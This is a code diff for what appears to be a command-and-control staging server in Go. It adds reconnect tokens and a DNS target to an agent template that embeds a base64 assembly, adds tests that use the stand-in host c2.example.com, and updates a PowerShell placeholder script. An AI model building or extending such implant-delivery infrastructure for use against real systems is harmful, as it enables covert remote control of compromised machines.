@@ -96,11 +110,13 @@ func (s *Store) Enroll(token string) error {
}
type AgentTemplateData struct {
AssemblyB64 string
Server string
Port int
CertPin string
EnrollToken string
AssemblyB64 string
Server string
Port int
CertPin string
EnrollToken string
ReconnectToken string
DNSTarget string
}
func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc {
@@ -113,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt
}
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
w.Header().Set("Cache-Control", "no-store")
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken})
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget})
}
}
+67
View File
@@ -0,0 +1,67 @@
package staging
import (
"net/http/httptest"
"testing"
"text/template"
"time"
)
func TestAuthenticateAllowsReconnectTokenAfterEnrollment(t *testing.T) {
store := NewStore(time.Minute)
sess, err := store.Create("c2.example.com", 443, "pin", "10.0.0.10:53")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
t.Fatalf("reconnect failed: %v", err)
}
}
func TestAuthenticateRejectsReusedEnrollTokenWithoutReconnectToken(t *testing.T) {
store := NewStore(time.Minute)
sess, err := store.Create("c2.example.com", 443, "pin", "")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, "wrong"); err == nil {
t.Fatal("reused enrollment token without reconnect token should fail")
}
}
func TestReconnectTokenSurvivesEnrollmentURLTTL(t *testing.T) {
store := NewStore(50 * time.Millisecond)
sess, err := store.Create("c2.example.com", 443, "pin", "")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
time.Sleep(75 * time.Millisecond)
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
t.Fatalf("reconnect token should survive URL TTL after enrollment: %v", err)
}
}
func TestAgentHandlerDoesNotHTMLEscapeAssemblyBase64(t *testing.T) {
store := NewStore(time.Minute)
sess, err := store.Create("c2.example.com", 443, "pin", "")
if err != nil {
t.Fatalf("create session: %v", err)
}
tmpl := template.Must(template.New("agent").Parse("{{.AssemblyB64}}"))
r := httptest.NewRequest("GET", "/a/"+sess.ID, nil)
r.SetPathValue("id", sess.ID)
w := httptest.NewRecorder()
AgentHandler(store, tmpl, "AA+/=").ServeHTTP(w, r)
if got := w.Body.String(); got != "AA+/=" {
t.Fatalf("assembly base64 was escaped or changed: %q", got)
}
}
+2
View File
@@ -23,6 +23,8 @@ $template = $template.Replace('{{.Server}}', '__SERVER__')
$template = $template.Replace('{{.Port}}', '443')
$template = $template.Replace('{{.CertPin}}', '__CERT_PIN__')
$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__')
$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__')
[IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8)
Write-Host "Wrote $OutFile"
Write-Host "Wrote $b64Out"